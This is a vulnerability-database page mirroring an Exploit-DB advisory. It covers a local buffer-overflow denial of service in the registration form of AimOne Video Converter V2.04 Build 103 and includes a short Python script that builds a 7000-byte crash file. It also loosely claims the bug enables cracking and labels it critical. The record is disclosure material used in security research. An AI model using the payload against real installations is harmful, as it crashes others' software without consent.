Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

AimOne Video Converter V2.04 Build 103 - Buffer Overflow (DoS)

🗓️ 01 Apr 2023 00:00:00Reported by nu11secur1tyType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 141 Views

AimOne Video Converter V2.04 Build 103 suffers from buffer overflow and local Denial of Service. The registration form is not working properly and crashes the video converter. A PoC exploit was created to demonstrate the buffer overflow vulnerability.

Code
## Title: AimOne Video Converter V2.04 Build 103 - Buffer Overflow (DoS)
## Author: nu11secur1ty
## Date: 01.05.2023
## Vendor: https://aimone-video-converter.software.informer.com/,
http://www.aimonesoft.com/
## Software: https://aimone-video-converter.software.informer.com/download/?ca85d0
## Reference:

## Description:
The AimOne Video Converter V2.04 Build 103 suffers from buffer
overflow and local Denial of Service.
The registration form is not working properly and crashes the video converter.
When the attacker decides to register the product. This can allow him
to easily crack the software and do more bad things it depending on
the case.

## STATUS: HIGH Vulnerability - CRITICAL

[+] Exploit:

```Python
#!/usr/bin/python
# nu11secur1ty

print("WELCOME to the AIMONE Video Converter 2.04 Build 103 - Buffer
Overflow exploit builder...\n")
input("Press any key to build the exploit...\n")
buffer = "\x41" * 7000

try:
	f=open("PoC.txt","w")
	print("[+] Creating %s bytes exploit payload.." %len(buffer))
	f.write(buffer)
	f.close()
	print("[+] The PoC file was created!")
except:
	print("File cannot be created")
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/AimOne/AimOne-Video-Converter-V2.04-Build-103)

## Proof and Exploit:
[href](https://streamable.com/v1hvbf)

## Time spent
`00:35:00`

## Writing an exploit
`00:15:00`


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Apr 2023 00:00Current
7.4High risk
Vulners AI Score7.4
aimone video converterbuffer overflowdenial of serviceexploitregistration formsoftware vulnerabilitypocaimone-video-converter-v2.04-build-103
141